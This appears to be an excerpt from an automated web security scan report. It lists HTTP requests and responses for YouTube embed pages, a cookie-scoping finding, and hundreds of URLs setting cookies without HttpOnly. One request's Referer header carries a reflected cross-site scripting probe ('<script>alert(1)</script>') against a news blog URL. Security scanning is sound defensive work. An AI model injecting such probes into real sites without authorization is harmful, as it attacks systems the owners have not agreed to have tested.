Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:03 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 9225

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Egyptian Cartoonist Operates Just Under the Censorship Radar</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflPrz
...[SNIP]...

16.302. http://www.youtube.com/embed/mm8byzo8zWE previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/mm8byzo8zWE

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/mm8byzo8zWE HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://cartoonblog.msnbc.redacted/?9bcba%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea8948eec705=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=2tNl54hzFtE

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:55:03 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: GEO=3887f2ae992adacf44a634e80b061986cwsAAAAzVVOtwdbzTUWl9w==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 9216

<!DOCTYPE html>
<html>
<head>
<title>YouTube - Interview with Australian Cartoonist Peter Broelman</title>

<link rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-embed-vflPrzZNL.css">
...[SNIP]...

17. Cookie without HttpOnly flag set previous next
There are 501 instances of this issue:

http://advertising.aol.com/privacy/advertisingcom/opt-out
http://c.microsoft.com/trans_pixel.aspx
https://careers.microsoft.com/
http://ccc01.opinionlab.com/o.asp
http://ccc01.opinionlab.com/o.asp
http://ccc01.opinionlab.com/o.asp
http://dating.redacted/cp.aspx
http://dating.redacted/en-us/partner/msn/38028.html
http://dating.redacted/index.aspx
http://dating.redacted/search/index.aspx
http://games.redacted/
http://malexj.tk/6M
http://msn.chemistry.com/cp/landing/44762
http://msn.chemistry.com/cp/landing/57269
http://msn.foxsports.com/video
http://msn.whitepages.com/
http://photobucket.com/$|zone.redacted|xbox.com|www.aol.com/$|http:/Webmail.aol.com/$|http:/travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
https://secure.opinionlab.com/ccc01/comment_card.asp
https://secure.opinionlab.com/ccc01/o.asp
https://secure.opinionlab.com/ccc01/o.asp
http://t.mookie1.com/t/v1/imp
http://travel.aol.com/$|http:/netscape.aol.com/$|http:/music.aol.com/radioguide/bb/$|http:/money.aol.com/$|http:/www.aim.com/help_faq/starting_out/buddylist.adp/$|http:/www.weblogs.com/$|http:/smallbusiness.aol.com/$|http:/www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://trueslant.com/milesobrien/
http://twitter.com/
http://twitter.com/$1
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/home
http://twitter.com/status/user_timeline/
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
https://twitter.com/ToddKenreck
http://www.amazon.com/gp/product/0470650923
http://www.amazon.com/gp/product/0672333368
http://www.amazon.com/gp/product/0981511821
http://www.amazon.com/gp/product/184968006X
http://www.amazon.com/gp/product/1935182374
http://www.bing.com/shopping/content/search
http://www.bing.com/travel/
http://www.bing.com/travel/content/search
http://www.bing.com/travel/deals/cheap-flights-to-the-caribbean.do
http://www.bing.com/travel/deals/last-minute-flight-deals.do
http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751
http://www.bing.com/travel/hotels
http://www.dailygrail.com/
http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/
http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.redacted|msn.com/wonderwall|v14.msn.com/|preview.redacted/|www.redacted/preview.aspx|mtv.com/videos/|mtv.com/
http://www.kanoodle.com/
http://www.kanoodle.com/ajax/search_spy_data.html
http://www.kanoodle.com/ajax/search_spy_data_today.html
http://www.kanoodle.com/search_spy.html
http://www.linkedin.com/cws/share-count
http://www.msdn.com/
https://www.msnfeedback.com/perseus/se.ashx
http://www.opensource.org/licenses/gpl-license.php
http://www.opensource.org/licenses/mit-license.php
http://www.popsci.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.scientificamerican.com/errors/404.cfm
http://www.tigerdirect.com/applications/SearchTools/item-details.asp
http://www.unica.com/
http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944
http://www.zacks.com/
http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227
http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6
http://ad.doubleclick.net/click
http://ad.doubleclick.net/clk
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/353.23.js.120x30/**
http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/353.516.js.120x30/**
http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1359.827.tk.100x25/1209024888
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1628572308
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/36374631
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/708002109
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392426**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296392449**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1296410362**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350847**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296350884**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296392206**
http://ad.yieldmanager.com/pixel
http://add.my.yahoo.com/rss
http://ads.asp.net/a.aspx
http://ads.neudesicmediagroup.com/ads/charts_1110_728x90.gif
http://ads.revsci.net/adserver/ako
http://alex-johnson.newsvine.com/
http://amch.questionmarket.com/adsc/d775684/10/38973908/decide.php
http://amch.questionmarket.com/adsc/d852149/4/40142779/decide.php
http://api.bit.ly/shorten
http://ar.voicefive.com/b/wc_beacon.pli
http://ar.voicefive.com/bmx3/broker.pli
http://articles.redacted/news/news.aspx
http://athima-chansanchai.newsvine.com/
http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607
http://atl.whitepages.com//AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link/ATCI=1294100002-3786607
http://atl.whitepages.com/AFTRSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
http://atl.whitepages.com/LSERVER/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
http://atl.whitepages.com/bserver/AAMALL/random=181503410/pageid=181503410/keyword=/site=MSN/area=PS.FORM.PERS/AAMB1/AAMSZ=top_rail/AAMB2/AAMSZ=med_rect/AAMB3/AAMSZ=custom_panel/AAMB4/AAMSZ=bottom_rail/AAMB5/AAMSZ=endemic_module/AAMB6/AAMSZ=landscape_module/AAMB7/AAMSZ=teaser_link
http://b.scorecardresearch.com/b
http://b.scorecardresearch.com/r
http://b.voicefive.com/b
http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/728/16566708061@x90
http://bit.ly/javascript-api.js
http://blogs.msdn.com/b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx
http://blogs.silverlight.net/ScriptResource.axd
http://blogs.silverlight.net/WebResource.axd
http://blogs.silverlight.net/showcasehosted/
http://blogs.silverlight.net/showcasehosted/default.aspx
http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetAdvertisements
http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetCountries
http://blogs.silverlight.net/showcasehosted/resources/services/BasicService.svc/GetDemos
http://bonniercorp.122.2o7.net/b/ss/timepopsci/1/H.14/s78723546345718
http://boyle.newsvine.com/
http://bs.serving-sys.com/BurstingPipe/adServer.bs
http://c.redcated/c.gif
http://c.bing.com/c.gif
http://c.redacted/c.gif
http://c.statcounter.com/t.php
http://calendar.live.com/calendar/calendar.aspx
http://careers.redacted/
http://citi.bridgetrack.com/event/
http://clk.redcated/APM/go/139941180/direct
http://clk.redcated/APM/go/148848786/direct
http://clk.redcated/BEL/go/262582811/direct
http://clk.redcated/CNT/go/286609711/direct
http://clk.redcated/CNT/go/287065754/direct
http://clk.redcated/CNT/go/299297287/direct
http://clk.redcated/NFX/go/297941249/direct/01/
http://clk.redcated/ULA/go/296652509/direct
http://clk.redcated/go/286026710/direct
http://clk.redcated/go/286609711/direct
http://clk.redcated/go/287065754/direct
http://clk.redcated/go/296652509/direct
http://clk.redcated/goiframe/184054348/262582811/direct/01
http://clk.redcated/goiframe/199711109/299297287/direct
http://context3.kanoodle.com/cgi-bin/context.cgi
http://conveu.admailtiser.com/st
http://d7.zedo.com/bar/v16-401/d2/jsc/fm.js
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js
http://deals.redacted/
http://dg.specificclick.net/
http://digitalnature.ro/
http://digitalnature.ro/projects/fusion
http://dm.de.mookie1.com/2/B3DM/2010DM/1860849269@x23
http://domdex.com/f
http://earthsky.org/
http://editorial.autos.redacted/article.aspx
http://editorial.autos.redacted/articles/default.aspx
http://editorial.autos.redacted/blogs/autosblog.aspx
http://editorial.autos.redacted/media/default.aspx
http://editorial.autos.redacted/media/video/default.aspx
http://editorial.autos.redacted/new-cars/default.aspx
http://editorial.autos.redacted/slideshow.aspx
http://editorial.autos.redacted/used-cars/default.aspx
http://engine2.adzerk.net/z/8277/adzerk1_2_4_43,adzerk2_2_17_45
http://engine2.adzerk.net/z/8277/adzerk2_2_17_45
http://entertainment.redacted/
http://entertainment.redacted/news/
http://entertainment.redacted/video/
http://expression.microsoft.com/en-us/cc136530.aspx
http://forums.silverlight.net/
http://forums.silverlight.net/default.aspx
http://forums.silverlight.net/forums/13.aspx
http://forums.silverlight.net/forums/14.aspx
http://forums.silverlight.net/forums/15.aspx
http://forums.silverlight.net/forums/16.aspx
http://forums.silverlight.net/forums/17.aspx
http://forums.silverlight.net/forums/18.aspx
http://forums.silverlight.net/forums/19.aspx
http://forums.silverlight.net/forums/20.aspx
http://forums.silverlight.net/forums/21.aspx
http://forums.silverlight.net/forums/25.aspx
http://forums.silverlight.net/forums/28.aspx
http://forums.silverlight.net/forums/35.aspx
http://forums.silverlight.net/forums/46.aspx
http://forums.silverlight.net/forums/51.aspx
http://forums.silverlight.net/forums/52.aspx
http://forums.silverlight.net/forums/53.aspx
http://forums.silverlight.net/forums/56.aspx
http://forums.silverlight.net/forums/59.aspx
http://forums.silverlight.net/forums/63.aspx
http://forums.silverlight.net/forums/64.aspx
http://forums.silverlight.net/forums/65.aspx
http://forums.silverlight.net/forums/66.aspx
http://forums.silverlight.net/forums/67.aspx
http://forums.silverlight.net/forums/68.aspx
http://forums.silverlight.net/forums/TopicsNotAnswered.aspx
http://forums.silverlight.net/forums/p/217026/518297.aspx
http://forums.silverlight.net/forums/p/217498/518305.aspx
http://forums.silverlight.net/forums/p/217562/518302.aspx
http://forums.silverlight.net/forums/p/217667/518301.aspx
http://forums.silverlight.net/forums/p/217709/518306.aspx
http://forums.silverlight.net/forums/p/217710/518307.aspx
http://forums.silverlight.net/forums/p/217719/518310.aspx
http://forums.silverlight.net/forums/p/217724/518300.aspx
http://forums.silverlight.net/forums/p/217726/518308.aspx
http://forums.silverlight.net/forums/p/217727/518309.aspx
http://forums.silverlight.net/forums/t/217026.aspx
http://forums.silverlight.net/forums/t/217498.aspx
http://forums.silverlight.net/forums/t/217562.aspx
http://forums.silverlight.net/forums/t/217667.aspx
http://forums.silverlight.net/forums/t/217709.aspx
http://forums.silverlight.net/forums/t/217710.aspx
http://forums.silverlight.net/forums/t/217719.aspx
http://forums.silverlight.net/forums/t/217724.aspx
http://forums.silverlight.net/forums/t/217726.aspx
http://forums.silverlight.net/forums/t/217727.aspx
http://forums.silverlight.net/forums/thread/396640.aspx
http://forums.silverlight.net/forums/topicsactive.aspx
http://forums.silverlight.net/forums/viewall.aspx
http://forums.silverlight.net/members/BradleyGZ.aspx
http://forums.silverlight.net/members/ColinBlair.aspx
http://forums.silverlight.net/members/Daoping-Liu-_2D00_-MSFT.aspx
http://forums.silverlight.net/members/Datikos.aspx
http://forums.silverlight.net/members/David-Anson.aspx
http://forums.silverlight.net/members/Fredrik_5F00_.aspx
http://forums.silverlight.net/members/Furukoo.aspx
http://forums.silverlight.net/members/GFR_5F00_2009.aspx
http://forums.silverlight.net/members/Gaz3ll.aspx
http://forums.silverlight.net/members/Jonathan-Shen-_1320_-MSFT.aspx
http://forums.silverlight.net/members/MF_5F00_MiEK.aspx
http://forums.silverlight.net/members/MisterGoodcat.aspx
http://forums.silverlight.net/members/Shi-Ding-_2D00_-MSFT.aspx
http://forums.silverlight.net/members/Skyrunner.aspx
http://forums.silverlight.net/members/TimeBandit.aspx
http://forums.silverlight.net/members/Xpert360.aspx
http://forums.silverlight.net/members/_2D002D00_Will_2D002D00_.aspx
http://forums.silverlight.net/members/abeaulieu.aspx
http://forums.silverlight.net/members/alt_5F00_fo.aspx
http://forums.silverlight.net/members/billb08.aspx
http://forums.silverlight.net/members/bradsevertson.aspx
http://forums.silverlight.net/members/brucemcmillan.aspx
http://forums.silverlight.net/members/clintong.aspx
http://forums.silverlight.net/members/dhook.aspx
http://forums.silverlight.net/members/emil.aspx
http://forums.silverlight.net/members/gary-frank.aspx
http://forums.silverlight.net/members/houmie.aspx
http://forums.silverlight.net/members/ilektrik.aspx
http://forums.silverlight.net/members/jamlew.aspx
http://forums.silverlight.net/members/jerry-weng-_2D00_-msft.aspx
http://forums.silverlight.net/members/jesseliberty.aspx
http://forums.silverlight.net/members/jimpoteet.aspx
http://forums.silverlight.net/members/jperl.aspx
http://forums.silverlight.net/members/khalzoro.aspx
http://forums.silverlight.net/members/kylemc.aspx
http://forums.silverlight.net/members/lein4d.aspx
http://forums.silverlight.net/members/malignate.aspx
http://forums.silverlight.net/members/mbanavige.aspx
http://forums.silverlight.net/members/pitchai.be.aspx
http://forums.silverlight.net/members/rightcoder.aspx
http://forums.silverlight.net/members/samw.aspx
http://forums.silverlight.net/members/sladapter.aspx
http://forums.silverlight.net/members/snelldl.aspx
http://forums.silverlight.net/members/sniles.aspx
http://forums.silverlight.net/members/swo.aspx
http://forums.silverlight.net/members/syed-amjad.aspx
http://forums.silverlight.net/members/tanmoy.r.aspx
http://forums.silverlight.net/members/thaicarrot.aspx
http://forums.silverlight.net/members/vikasamin.aspx
http://forums.silverlight.net/members/yifung.aspx
http://forums.silverlight.net/search/
http://forums.silverlight.net/user/profile.aspx
http://forums.silverlight.net/user/viewonline.aspx
http://health.redacted/
http://helenaspopkin.newsvine.com/
http://ingame.newsvine.com/
http://js.revsci.net/gateway/gw.js
http://latino.redacted/
http://leadback.advertising.com/adcedge/lb
http://lifestyle.redacted/
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/relationships/staticslideshowglamour.aspx
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx
http://lifestyle.redacted/your-life/family-parenting/article.aspx
http://lifestyle.redacted/your-life/new-year-new-you/video.aspx
http://lifestyle.redacted/your-life/your-money-today/article.aspx
http://lifestyle.redacted/your-life/your-money-today/video.aspx
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx
http://lifestyle.redacted/your-look/video/
http://live.newsvine.com/
http://local.redacted/
http://local.redacted/events.aspx
http://local.redacted/gas-traffic.aspx
http://local.redacted/hourly.aspx
http://local.redacted/movies-events.aspx
http://local.redacted/news.aspx
http://local.redacted/restaurants.aspx
http://local.redacted/sports.aspx
http://local.redacted/ten-day.aspx
http://local.redacted/weather.aspx
http://login.live.com/login.srf
https://login.live.com/login.srf
https://login.live.com/pp900/
https://login.live.com/ppsecure/post.srf
https://login.live.com/ppsecure/secure.srf
https://login.live.com/resetpw.srf
https://login.silverlight.net/login/createuser.aspx
https://login.silverlight.net/login/signin.aspx
http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif
http://media.fastclick.net/w/tre
http://metrics.hoovers.com/b/ss/hooverspaid-prod,%20hooversglobal-prod/1/H.19.4/s29599577935878
http://michaelwann.newsvine.com/
http://money.redacted/auto-insurance/article.aspx
http://money.redacted/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx
http://money.redacted/currency/currency-clash-dollar-vs-euro-smartmoney.aspx
http://money.redacted/identity-theft/default-dyn.aspx
http://money.redacted/market-news/post.aspx
http://money.redacted/mutual-fund/default-dyn.aspx
http://money.redacted/saving-money/50-30-20-budget.aspx
http://redacted/
http://redacted/detail/stock_quote
http://redacted/inc/Attributions.asp
http://redacted/personal-finance/
http://movies.redacted/
http://movies.redacted/academy-awards/snubs/
http://movies.redacted/jason-statham/photo-gallery/feature/
http://movies.redacted/mom-pop-culture/tiger-mom-movie/story-feature/
http://movies.redacted/new-on-dvd/movies/
http://movies.redacted/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/
http://movies.redacted/paralleluniverse/dissecting-dark-knight-villains/story/across-the-universe/
http://movies.redacted/showtimes/showtimes.aspx
http://movies.redacted/the-rundown/the-guard/story_5/
http://msdn.microsoft.com/
http://msdn.microsoft.com/en-us/library/cc838158(VS.95
http://msdn.microsoft.com/en-us/library/cc838158(VS.95).aspx
http://msdn.microsoft.com/en-us/library/ff637515(VS.92
http://msdn.microsoft.com/en-us/library/ff637515(VS.92).aspx
http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx
http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s21495556451845
http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23775069806724
http://msnbc.112.2o7.net/b/ss/msnbcnewsvine,msnbcom/1/H.17/s23824761856812
https://msnia.login.live.com/ppsecure/post.srf
http://msnportal.112.2o7.net/b/ss/msnportalhome/1/H.7-pdv-2/{0}
http://msnportal.112.2o7.net/b/ss/msnportalusenmoney/1/H.7-pdv-2/{0}
http://music.redacted/
http://my.live.com/
http://my.redacted/
http://oasc03049.popsci.com/RealMedia/ads/adstream_mjx.ads/www.popsci.com/index.jsp/1660224145@Top,Top1,Right1,Right2,Right3,Bottom,BottomRight,Position1,x96,Frame1,x89,x90,x01,x02,x03,x04,x05
http://oascentral.scientificamerican.com/RealMedia/ads/adstream_mjx.ads/sciam.com/observations/1762199143@Top,Right1,Right2,x40,x41
http://onlinehelp.microsoft.com/en-us/bing/ff808490.aspx
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/qwlinfo.aspx
http://onlinehelp.microsoft.com/en-us/msn/qwlnotyours.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://optimized-by.rubiconproject.com/a/7665/13236/25159-2.js
http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js
http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js
http://pix04.revsci.net/D08734/a1/0/0/0.gif
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif
http://ptsd.eyewonder.com/ewr
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64
http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64
http://r1-ads.ace.advertising.com/site=730461/size=728090/u=2/bnum=12110217/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fmsn.whitepages.com%252F
http://realestate.redacted/
http://realestate.redacted/OmRedir.aspx
http://realestate.redacted/article.aspx
http://realestate.redacted/slideshow.aspx
http://redtape.newsvine.com/
http://s18.sitemeter.com/js/counter.asp
https://sb.voicefive.com/b
http://search.redacted/
https://security.live.com/LoginStage.aspx
https://security.live.com/LoginStage.aspx
http://seedmagazine.com/
http://seg.admailtiser.com/st
https://signup.live.com/signup.aspx
http://social.entertainment.redacted/bloglist.aspx
http://social.entertainment.redacted/movies/blogs/the-hitlist-blog.aspx
http://social.entertainment.redacted/movies/blogs/videodrone-blog.aspx
http://social.entertainment.redacted/movies/blogs/videodrone-blogpost.aspx
http://social.msdn.microsoft.com/Forums/en-US/windowsphone7series/threads
http://specials.redacted/
http://specials.redacted/A-List/Entertainment/Charlie-Sheen-checks-into-rehab-show-on-hiatus.aspx
http://specials.redacted/A-List/Entertainment/Diddy-sued-for-$1-trillion.aspx
http://specials.redacted/A-List/Entertainment/Famous-February-birthdays.aspx
http://specials.redacted/A-List/Entertainment/Jesse-James-ex-arrested.aspx
http://specials.redacted/A-List/Entertainment/PETAs-newest-naked-celeb.aspx
http://specials.redacted/A-List/Entertainment/Unlikely-celebrity-friendships.aspx
http://specials.redacted/A-List/Lifestyle/Billionaires-caucus.aspx
http://specials.redacted/A-List/Lifestyle/Cruise-ships-avoiding-stops-in-Mazatlan.aspx
http://specials.redacted/A-List/Lifestyle/Daughter-held-in-moms-run-over-death.aspx
http://specials.redacted/A-List/Lifestyle/Egypt-new-vp.aspx
http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx
http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx
http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx
http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx
http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx
http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx
http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx
http://specials.redacted/IEIncreaseFont_preview.aspx
http://specials.redacted/alphabet.aspx
http://statse.webtrendslive.com/dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif
http://suzanne-choney.newsvine.com/
http://team.silverlight.net/tips-and-training/silverlight-tv-59-what-goes-into-baking-silverlight/
http://technolog2.newsvine.com/
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl
http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl/
http://toddkenreck.newsvine.com/
http://top.newsvine.com/
http://top.newsvine.com/users
http://tv.redacted/
http://tv.redacted/tv/article.aspx
http://us.mc1125.mail.yahoo.com/mc/compose
http://redcated/CNT/iview/299297287/direct
http://wbenedetti.newsvine.com/
http://webmail.aol.com/28200/aim/en-us/mail/compose-message.aspx
http://www.bing.com/
http://www.bing.com/challenge
http://www.bing.com/events/search
http://www.bing.com/fd/ls/GLinkPing.aspx
http://www.bing.com/fd/ls/l
http://www.bing.com/finance/stockscreener
http://www.bing.com/images/results.aspx
http://www.bing.com/local/ypdefault.aspx
http://www.bing.com/maps/
http://www.bing.com/maps/default.aspx
http://www.bing.com/maps/explore/
http://www.bing.com/msnhomepagehistory.aspx
http://www.bing.com/news/results.aspx
http://www.bing.com/news/search
http://www.bing.com/news/search
http://www.bing.com/results.aspx
http://www.bing.com/sck
http://www.bing.com/search
http://www.bing.com/search
http://www.bing.com/search/
http://www.bing.com/shopping
http://www.bing.com/shopping/bird-feeders/search
http://www.bing.com/shopping/healthy-cooking/r/151
http://www.bing.com/shopping/makeup/c/4259
http://www.bing.com/shopping/search
http://www.bing.com/shopping/swimwear/c/4503
http://www.bing.com/shopping/valentines-day-gift-ideas/r/144
http://www.bing.com/videos/browse
http://www.bing.com/videos/results.aspx
http://www.bing.com/videos/results.aspx
http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa
http://www.bing.com/videos/watch/video/black-rhino-celebrates-40th-birthday/ufh7y1eo
http://www.bing.com/videos/watch/video/emotional-and-surprising-journeys/17wgxnwyo
http://www.bing.com/videos/watch/video/glee-season-2-volume-1-dvd-extra-rocky-horror/5svqwfs
http://www.bing.com/videos/watch/video/healthy-body-healthy-wallet/1d3rfv95o
http://www.bing.com/videos/watch/video/michaels-new-friend/17w7aehdt
http://www.bing.com/videos/watch/video/news-9-makes-sure-you-know-its-snowing/1d07cesck
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv
http://www.bing.com/videos/watch/video/ryan-seacrest-part-1/17wnurhvy
http://www.bing.com/videos/watch/video/where-it-all-began/17wv375x2
http://www.bing.com/videos/watch/video/whos-the-one-guest-regis-could-never-get/6fzsvmo
http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video
http://www.co2stats.com/prowidget.php
http://www.collectspace.com/
http://www.facebook.com/2008/fbml
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/sharer.php
http://www.facebook.com/todd.kenreck
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.hoovers.com/favicon.ico
http://www.interactivedata-rts.com/
http://www.live.com/
http://www.microsoft.com/web/gallery/install.aspx
http://www.morningstar.com/
http://www.redacted/
http://www.msnbc.redacted/
http://www.msnbc.redacted/id/8004316/
http://www.newsvine.com/
http://www.newsvine.com/_action/article/emailThis
http://www.newsvine.com/_action/user/logout
